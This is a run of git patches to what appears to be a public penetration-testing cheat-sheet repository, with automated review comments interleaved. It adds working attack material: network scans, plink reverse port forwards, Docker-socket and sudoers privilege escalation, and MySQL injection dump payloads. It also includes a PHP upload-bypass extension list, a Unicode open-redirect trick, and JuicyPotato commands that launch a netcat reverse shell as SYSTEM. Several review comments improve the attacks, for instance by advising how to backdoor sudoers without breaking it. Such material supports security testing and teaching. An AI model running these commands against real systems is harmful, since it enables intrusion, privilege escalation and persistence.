@@ -103,8 +103,21 @@ List Nmap scripts : ls /usr/share/nmap/scripts/ masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000 -masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp -masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst +# find machines on the network +sudo masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp +cat masscan_machines.tmp | grep open | cut -d " " -f4 | sort -u > masscan_machines.lst + +# find open ports for one machine +sudo masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst + + +# TCP grab banners and services informations +TCP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep tcp | cut -d " " -f3 | tr '\n' ',' | head -c -1) +[ "$TCP_PORTS" ] && sudo nmap -sT -sC -sV -v -Pn -n -T4 -p$TCP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_tcp $MACHINE_IP + +# UDP grab banners and services informations +UDP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep udp | cut -d " " -f3 | tr '\n' ',' | head -c -1) +[ "$UDP_PORTS" ] && sudo nmap -sU -sC -sV -v -Pn -n -T4 -p$UDP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_udp $MACHINE_IP ``` ## Reconnoitre diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 4f05b02e..ebc262ee 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md 
@@ -195,10 +195,17 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro ## plink ```powershell -plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 --> exposes the RDP port of the machine in the port 3390 of the SSH Server +# exposes the SMB port of the machine in the port 445 of the SSH Server +plink -l root -pw toor -R 445:127.0.0.1:445 +# exposes the RDP port of the machine in the port 3390 of the SSH Server +plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 + plink -l root -pw mypassword 192.168.18.84 -R plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445 + plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP] +# redirects the Windows port 445 to Kali on port 22 +plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185 ``` ## ngrok diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 9401316f..84d92b64 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -490,7 +490,8 @@ net start upnphost sc config upnphost depend="" ``` -Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals. +Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals or [accesschk-XP.exe - github.com/phackt](https://github.com/phackt/pentest/blob/master/privesc/windows/accesschk-XP.exe) + ```powershell $ accesschk.exe -uwcqv "Authenticated Users" * /accepteula RW SSDPSRV @@ -588,7 +589,6 @@ Check if these registry values are set to "1". ```bat $ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated - $ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated ``` 
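Review bot: in the `Network Discovery.md` hunk the second `masscan` call writes to `$MACHINE_IP/scans/masscan-ports.lst` and both nmap calls write `-oA $MACHINE_IP/scans/nmap_tcp` / `nmap_udp`, but nothing creates that directory; add `mkdir -p $MACHINE_IP/scans` before the scan or the commands fail on a missing directory. Two smaller points: because the scans run under `sudo`, the `.lst` and `-oA` files end up owned by root, and `cat masscan_machines.tmp | grep open | cut -d " " -f4` can be `grep open masscan_machines.tmp | cut -d " " -f4` (field 4 is the host and field 3 the port in masscan's `-oL` list format, so the two `cut` calls are consistent with each other).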
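Review bot: in the `Network Pivoting Techniques.md` hunk the first added command, `plink -l root -pw toor -R 445:127.0.0.1:445`, has no SSH server argument, so plink has nothing to connect to; the line below it shows the intended form (`plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389`) and this one needs `ssh-server-ip` in the same place. The comment on the last added line, `# redirects the Windows port 445 to Kali on port 22`, is misleading: `-P 22` is the SSH port on `192.168.12.185`, and the forward exposes the Windows host's 445 as port 445 on the Kali box, so say that instead. Passing `-pw` on the command line also leaves the password in the process list and shell history, which deserves a caveat since every example in the section does it.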
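Review bot: the `accesschk` hunk in `Windows - Privilege Escalation.md` adds a second download source, `accesschk-XP.exe` from `phackt/pentest` on GitHub, without saying why; the file name suggests an older build that still runs on XP/2003, which is presumably also why the Sysinternals link points at an archived 2008 copy. State that, and note that it is a redistributed binary rather than a Microsoft download, so its hash should be compared against a known-good Sysinternals release before it is dropped on a host.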
diff --git a/Upload Insecure Files/CVE Image Tragik/README.md b/Upload Insecure Files/Picture Image Magik/README.md similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/README.md rename to Upload Insecure Files/Picture Image Magik/README.md diff --git a/Upload Insecure Files/CVE Image Tragik/imagemagik_ghostscript_reverse_shell.jpg b/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagemagik_ghostscript_reverse_shell.jpg rename to Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg 
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_wget.gif b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_wget.gif rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_bind_shell_nc.mvg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_bind_shell_nc.mvg rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg 
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_curl.png b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_curl.png rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_portscan.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_portscan.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_remote_connection.mvg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_remote_connection.mvg rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_reverse_shell_bash.mvg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_reverse_shell_bash.mvg rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_touch.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_touch.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg 
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik2_burpcollaborator_passwd.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik2_burpcollaborator_passwd.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik2_centos_id.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik2_centos_id.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_id.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_id.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg 
diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_shell.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_shell.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_shell2.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_shell2.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg From 72c54b5c1b6a4e0d535f397647a1f88a27bb9508 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Thu, 29 Aug 2019 09:49:09 +0200 Subject: [PATCH 047/222] add missing backtick --- Methodology and Resources/Network Pivoting Techniques.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index ebc262ee..90a60c0e 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -256,7 +256,7 @@ unzip ngrok-stable-linux-amd64.zip | :------------- | :------------------------------------------ | | ncat | `ncat localhost 8080 -c "ncat localhost 9090"` | | socat | `socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090` | -| remote host 1 | `ncat -l -p 8080 < file | +| remote host 1 | `ncat -l -p 8080 < file` | | remote host 2 | `ncat -l -p 9090 > newfile` | ## References 
@@ -265,4 +265,4 @@ unzip ngrok-stable-linux-amd64.zip * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/) * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences) * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/) -* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/) \ No newline at end of file +* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/) From 0625e2aebfca40cd317dab7b69236a9165cd20db Mon Sep 17 00:00:00 2001 From: Ricardo Date: Fri, 30 Aug 2019 08:57:22 +0100 Subject: [PATCH 048/222] Add Host/Split Unicode Normalization Add Host/Split Exploitable Antipatterns in Unicode Normalization BH 2019 for filter bypass --- Open Redirect/README.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/Open Redirect/README.md b/Open Redirect/README.md index 0584673e..57365b08 100644 --- a/Open Redirect/README.md +++ b/Open Redirect/README.md @@ -114,6 +114,12 @@ http://www.yoursite.com/http://www.theirsite.com/ http://www.yoursite.com/folder/www.folder.com ``` +Host/Split Unicode Normalization +```powershell +https://evil.c℀.example.com . ---> https://evil.ca/c.example.com +http://a.com/X.b.com +``` + XSS from Open URL - If it's in a JS variable ```powershell 
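Review bot: the Host/Split block added to `Open Redirect/README.md` shows the effect but not the mechanism, and `http://a.com/X.b.com` is never explained. Say what happens: `℀` (U+2100) decomposes under NFKC normalization to `a/c`, so a host-name check that sees `evil.c℀.example.com` accepts it as a subdomain of `example.com`, while the normalized URL the client actually requests is `https://evil.ca/c.example.com`, with the host cut at the new `/`. The stray ` . ` before `--->` on the first line reads as a typo, and the second line should say what `X` stands for (a character whose compatibility decomposition contains `/`) or be dropped.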
@@ -169,4 +175,6 @@ http://www.example.com/redirect.php?url=javascript:prompt(1) * [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet) * [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) * [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html) -* [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/) \ No newline at end of file +* [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/) +* [Host/Split +Exploitable Antipatterns in Unicode Normalization - BlackHat US 2019](https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf) From 3ca07aeb7af98d68357eef98ad18b4a445628694 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 30 Aug 2019 17:25:07 +0200 Subject: [PATCH 049/222] Docker Privesc - Unix socket --- .../Linux - Privilege Escalation.md | 7 +++++++ SQL Injection/MySQL Injection.md | 13 +++++++++++++ 2 files changed, 20 insertions(+) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 047a338f..e9d0aabc 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md 
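Review bot: the new reference in `Open Redirect/README.md` is split across two lines inside the link text (`* [Host/Split` followed by `Exploitable Antipatterns in Unicode Normalization - BlackHat US 2019](...)`); join it onto one line so the list item renders as a single link like the entries above it. The `\ No newline at end of file` fix in the same hunk is welcome and should stay.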
@@ -574,6 +574,13 @@ sh-5.0# id uid=0(root) gid=0(root) groups=0(root) ``` +More docker privilege escalation using the Docker Socket. + +```powershell +sudo docker -H unix:///google/host/var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash +sudo docker -H unix:///google/host/var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh +``` + ### LXC/LXD The privesc requires to run a container with elevated privileges and mount the host filesystem inside. diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index b7be9050..2aa39306 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -250,7 +250,20 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) ```sql (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)# + (select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)# + +-- SecurityIdiots +make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) + +-- Profexer +(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a) + +-- Dr.Z3r0 +(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)) + +-- M@dBl00d +(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)) ``` ## MYSQL Current queries From 2b1900e046daa89d2ac31e108f001df80e0ccc43 Mon Sep 17 00:00:00 2001 
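Review bot: the Docker-socket hunk in `Linux - Privilege Escalation.md` runs both commands through `sudo`, which defeats the point on a privilege-escalation page: if `sudo docker` works you are already root. The escalation is that a user who can write to the socket (typically through the `docker` group) can start a container that mounts `/` or enters PID 1's namespaces, so drop `sudo` and state that precondition. The socket path `unix:///google/host/var/run/docker.sock` is also specific to one environment; the usual path is `/var/run/docker.sock`, so either give that as the default or say where the `/google/host` prefix comes from. A caveat worth adding: both commands pull an image (`ubuntu`, `debian`) if it is not cached, so they need network access from the host.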
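Review bot: the Dr.Z3r0 one-liner added to `MySQL Injection.md` is missing a closing parenthesis: `(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))` opens eight and closes seven, so it needs one more `)` at the end. Two documentation points: `0xa3a` in the M@dBl00d line has an odd number of hex digits, which MySQL reads as `0x0a3a` (newline, colon), so write it as `0x0a3a` to make that intent obvious, and say what the hex constants decode to (`0x3c6c693e` is `<li>`, `0x3C62723E` is `<br>`, `0x3a` is `:`) so readers know which separators the output uses.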
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 2 Sep 2019 12:36:40 +0200 Subject: [PATCH 050/222] PrivEsc - sudoers + Upload PHP --- GraphQL Injection/README.md | 3 ++- JSON Web Token/README.md | 2 +- .../Linux - Privilege Escalation.md | 6 +++--- .../Extension PHP/extensions.lst | 20 +++++++++++++++++++ Upload Insecure Files/README.md | 11 +++++++++- 5 files changed, 36 insertions(+), 6 deletions(-) create mode 100644 Upload Insecure Files/Extension PHP/extensions.lst diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index caaf7087..b684bc60 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -243,4 +243,5 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27% * [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/) * [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql) * [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/) -* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531) \ No newline at end of file +* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531) +* [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417) \ No newline at end of file diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index 9d83b6be..ccdb745b 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md 
@@ -250,7 +250,7 @@ Secret is "Sn1f" ### Hashcat -> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](twitter.com/hashcat/status/955154646494040065) +> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](https://twitter.com/hashcat/status/955154646494040065) ```bash /hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index e9d0aabc..53f5588f 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -84,7 +84,7 @@ * Checks if password hashes are stored in /etc/passwd * Extract full details for 'default' uid's such as 0, 1000, 1001 etc * Attempt to read restricted files i.e. /etc/shadow - * List current users history files (i.e .bash_history, .nano_history etc.) + * List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.) * Basic SSH checks * Privileged access: * Which users have recently used sudo @@ -455,9 +455,9 @@ echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers # use SUDO without password echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers +echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers ``` - ## NFS Root Squashing When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it @@ -620,7 +620,7 @@ Precompiled exploits can be found inside these repositories, run them at your ow * [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits) * [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/) -The following exploits are known to work well. +The following exploits are known to work well, search for another exploits using `searchsploit -w linux kernel centos`. ### CVE-2016-5195 (DirtyCow) 
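Review bot: in the `Linux - Privilege Escalation.md` sudoers hunk the added line `echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers` appends to `/etc/sudoers` without going through `visudo`, and a syntax error there disables `sudo` for everyone, locking the attacker out of the path they were using; suggest running `visudo -c` after the append, or writing the line to a file under `/etc/sudoers.d/` where that directory is included.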
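Review bot: in the kernel-exploits hunk of `Linux - Privilege Escalation.md`, `search for another exploits using` should read `search for other exploits using`, and it is worth saying what `-w` does in `searchsploit -w linux kernel centos` (it prints the exploit-db URLs rather than local paths) so readers know why that flag was chosen.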
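Review bot: in the LinEnum checklist hunk of `Linux - Privilege Escalation.md` the new text `.mysql_history , etc.` has a stray space before the comma; it should be `.mysql_history, etc.`.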
diff --git a/Upload Insecure Files/Extension PHP/extensions.lst b/Upload Insecure Files/Extension PHP/extensions.lst new file mode 100644 index 00000000..b3481610 --- /dev/null +++ b/Upload Insecure Files/Extension PHP/extensions.lst @@ -0,0 +1,20 @@ +.jpeg.php +.jpg.php +.png.php +.php +.php3 +.php4 +.php5 +.php7 +.pht +.phar +.phpt +.pgif +.phtml +.phtm +.php%00.gif +.php\x00.gif +.php%00.png +.php\x00.png +.php%00.jpg +.php\x00.jpg \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index e0e7bb0a..82347ce6 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -54,8 +54,17 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm ### Upload tricks -- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()` +- Null byte (works well against `pathinfo()`) + * .php%00.gif + * .php\x00.gif + * .php%00.png + * .php\x00.png + * .php%00.jpg + * .php\x00.jpg - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif` + * `Content-Type : image/gif` + * `Content-Type : image/png` + * `Content-Type : image/jpeg` ### Picture upload with LFI From 5455c30ec7ef7aa4a4e17959709469941ada8379 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 8 Sep 2019 19:44:51 +0200 Subject: [PATCH 051/222] Juicy Potato + XXE update --- .../Active Directory Attack.md | 4 +- .../Windows - Privilege Escalation.md | 11 ++- SQL Injection/MySQL Injection.md | 16 +++- Server Side Request Forgery/README.md | 3 +- XXE Injection/README.md | 74 ++++++++++++++----- 5 files changed, 82 insertions(+), 26 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 0ee74089..f48597e4 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md 
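Review bot: the new `Upload Insecure Files/Extension PHP/extensions.lst` mixes three representations of one idea: the `.php%00.gif` entries are URL-encoded and only become a null byte if the server decodes them, the `.php\x00.gif` entries are a literal backslash, `x`, `0`, `0` that no fuzzer turns into byte 0x00 unless told to interpret escapes, and neither is a raw null. Document which form each target tool expects, or keep the list to one encoding and note how to produce the raw byte; the file also lacks a trailing newline, which git flags with `\ No newline at end of file`.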
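Review bot: the MIME-type bullet in `Upload Insecure Files/README.md` now says to change the header `to Content-Type : image/gif` and then lists `image/gif`, `image/png` and `image/jpeg` as sub-bullets, so the sentence and the list disagree; end the sentence at "to an image type:" and let the list carry the values. The header is also written as `Content-Type : ` with a space before the colon, which is not how it appears on the wire (`Content-Type: image/gif`); the three new sub-bullets repeat that, so fix them while here. For the null-byte item, a sentence saying that the `%00` and `\x00` forms are what the request contains, not what lands on disk, would stop readers from pasting them literally into a filename.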
@@ -9,8 +9,8 @@ * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol) * [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit) * [Password in AD User comment](#password-in-ad-user-comment) - * [Pass-the-Ticket Golden Tickets](#passtheticket-golden-tickets) - * [Pass-the-Ticket Silver Tickets](#passtheticket-silver-tickets) + * [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) + * [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) * [Kerberoast](#kerberoast) * [KRB_AS_REP roasting](#krb_as_rep-roasting) * [Pass-the-Hash](#pass-the-hash) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 84d92b64..8205602a 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -721,9 +721,14 @@ Binary available at : https://github.com/ohpe/juicy-potato/releases 3. Execute JuicyPotato to run a privileged command. ```powershell - juicypotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7} - juicypotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} - # -l : local listener port + JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7} + JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} + JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe" + Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337 + ...... + [+] authresult 0 + {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM + [+] CreateProcessWithTokenW OK ``` ## EoP - Common Vulnerabilities and 